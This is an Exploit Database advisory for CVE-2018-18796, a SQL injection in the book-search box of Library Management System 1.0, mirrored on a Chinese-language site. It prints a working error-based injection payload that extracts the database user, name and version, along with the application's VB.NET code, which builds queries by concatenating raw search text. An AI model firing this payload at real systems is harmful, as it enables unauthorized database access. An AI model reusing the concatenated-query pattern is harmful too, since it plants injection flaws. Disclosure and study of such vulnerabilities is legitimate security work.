Library Management System 1.0 – ‘frmListBooks’ SQL Injection

• Exploit Database
• 104 阅读

• 作者： Ihsan Sencan
  日期： 2018-10-29
• 类别：

  • webapps
  平台：

  • aspx
• 来源：https://www.exploit-db.com/exploits/45706/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56

  # Exploit Title: Library Management System 1.0 - &apos;frmListBooks&apos; SQL Injection # Dork: N/A # Date: 2018-10-29 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://www.sourcecodester.com/users/janobe # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/librarymanagementsystem.zip # Version: 1.0 # Category: Windows # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2018-18796   # POC: # 1) # textSearch System.Windows.Forms.TextBox / [SQL] # # %&apos; And (SElecT 112 FRom(SELECT CoUNT(*),conCAT((SELecT (ELT(112=112,1))),CONCAT_WS(0x203a20,USEr(),DATABASE(),VERsiON()),FLOOR(RAnD(0)*2))x FRoM INFORmaTION_SCHeMA.PLuGINS GRoUP BY x)a) AnD&apos;%&apos;=&apos; # # https://1.bp.blogspot.com/-8FBYHFTLhhQ/W9YnCQg0nZI/AAAAAAAAENM/St0sn1IYjDs5kTjvYQNtT_mBmOEv-RaIgCLcBGAs/s1600/sql1.png # #[PATH]/forms/frmListofBooks.vb #...   Public Class frmListBooks   Private Sub frmListBooks_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load sql = "SELECT <code>AccessionNo</code>, <code>BookTitle</code>, <code>BookDesc</code> as &apos;Description&apos;, <code>Author</code>, <code>PublishDate</code>, <code>BookPublisher</code>, <code>Category</code>,BookType as &apos;typeOfBooks&apos;, <code>BookPrice</code> as &apos;Price&apos;, DeweyDecimal " & _ ", Status FROM <code>tblbooks</code> b, <code>tblcategory</code> c WHERE b.<code>CategoryId</code>=c.<code>CategoryId</code> " reloadDtg(sql, dtgList) End Sub Private Sub txtSerach_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles txtSearch.TextChanged sql = "SELECT <code>AccessionNo</code>, <code>BookTitle</code>, <code>BookDesc</code> as &apos;Description&apos;, <code>Author</code>, <code>PublishDate</code>, <code>BookPublisher</code>, <code>Category</code>,BookType as &apos;typeOfBooks&apos;, <code>BookPrice</code> as &apos;Price&apos;, DeweyDecimal " & _ ", Status FROM <code>tblbooks</code> b, <code>tblcategory</code> c WHERE b.<code>CategoryId</code>=c.<code>CategoryId</code>AND (<code>BookTitle</code> Like &apos;%" & txtSearch.Text & "%&apos; OR <code>Author</code> Like &apos;%" & txtSearch.Text & "%&apos; OR <code>AccessionNo</code> Like &apos;%" & txtSearch.Text & "%&apos;)" reloadDtg(sql, dtgList) End Sub Private Sub btnAdd_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnAdd.Click Try If dtgList.CurrentRow.Cells(10).Value = "Available" Then frmBorrow.txtAccesionNumBorrow.Text = dtgList.CurrentRow.Cells(0).Value Me.Close() Else MsgBox("The book is already borrowed.", MsgBoxStyle.Exclamation) End If Catch ex As Exception End Try End Sub Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click Me.Close() End Sub End Class